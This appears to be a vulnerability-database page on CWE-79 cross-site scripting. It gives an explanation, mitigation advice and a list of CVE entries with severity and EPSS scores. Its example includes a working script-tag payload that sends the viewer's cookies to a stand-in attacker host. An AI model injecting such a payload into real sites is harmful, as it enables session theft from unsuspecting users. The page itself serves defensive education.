Fallos del tipo CWE-79

28.519 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-24227MEDIUMA cross-site scripting (XSS) vulnerability in BoltWire v7.10 and v 8.00 allows attackers to execute arbitrary web scripts or HTML via a crafEPSS 2.3%CVE-2021-39350MEDIUMFV Flowplayer Video Player <= 7.5.0.727 - 7.5.2.727 Reflected Cross-Site ScriptingEPSS 2.2%CVE-2023-38435—Apache Felix Healthcheck Webconsole Plugin: XSS in healthcheck webconsole pluginEPSS 2.2%CVE-2023-25439MEDIUMStored Cross Site Scripting (XSS) vulnerability in Square Pig FusionInvoice 2023-1.0, allows attackers to execute arbitrary code via the desEPSS 2.2%CVE-2021-24746—Sassy Social Share < 3.3.40 - Reflected Cross-Site ScriptingEPSS 2.2%CVE-2023-6710MEDIUMMod_cluster/mod_proxy_cluster: stored cross site scriptingEPSS 2.2%CVE-2023-42629CRITICALStored cross-site scripting (XSS) vulnerability in the manage vocabulary page in Liferay Portal 7.4.2 through 7.4.3.87, and Liferay DXP 7.4 EPSS 2.2%CVE-2023-42628CRITICALStored cross-site scripting (XSS) vulnerability in the Wiki widget in Liferay Portal 7.1.0 through 7.4.3.87, and Liferay DXP 7.0 fix pack 83EPSS 2.2%CVE-2024-4406HIGHXiaomi Pro 13 GetApps integral-dialog-page Cross-Site Scripting Remote Code Execution VulnerabilityEPSS 2.2%CVE-2022-23988—WS Form < 1.8.176 - Unauthenticated Stored Cross-Site ScriptingEPSS 2.2%CVE-2020-1456MEDIUMA cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web requesEPSS 2.2%CVE-2022-47870MEDIUMA Cross Site Scripting (XSS) vulnerability in the web SQL monitor login page in Redgate SQL Monitor 12.1.31.893 allows remote attackers to iEPSS 2.2%CVE-2022-0189—WP RSS Aggregator < 4.20 - Reflected Cross-Site Scripting (XSS)EPSS 2.2%CVE-2019-3847MEDIUMA vulnerability was found in moodle before versions 3.6.3, 3.5.5, 3.4.8 and 3.1.17. Users with the "login as other users" capability (such aEPSS 2.2%CVE-2021-44791—Reflected XSS on certain HTTP endpointsEPSS 2.2%CVE-2024-26152MEDIUMLabel Studio vulnerable to Cross-site Scripting if `<Choices>` or `<Labels>` are used in labeling config EPSS 2.2%CVE-2023-46732CRITICALReflected Cross-site scripting through revision parameter in content menu in XWiki PlatformEPSS 2.2%CVE-2021-25112—WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)EPSS 2.2%CVE-2019-7004MEDIUMAvaya IP Office XSS VulnerabilityEPSS 2.2%CVE-2022-1221—Gwyn's Imagemap Selector <= 0.3.3 - Reflected Cross-Site ScriptingEPSS 2.2%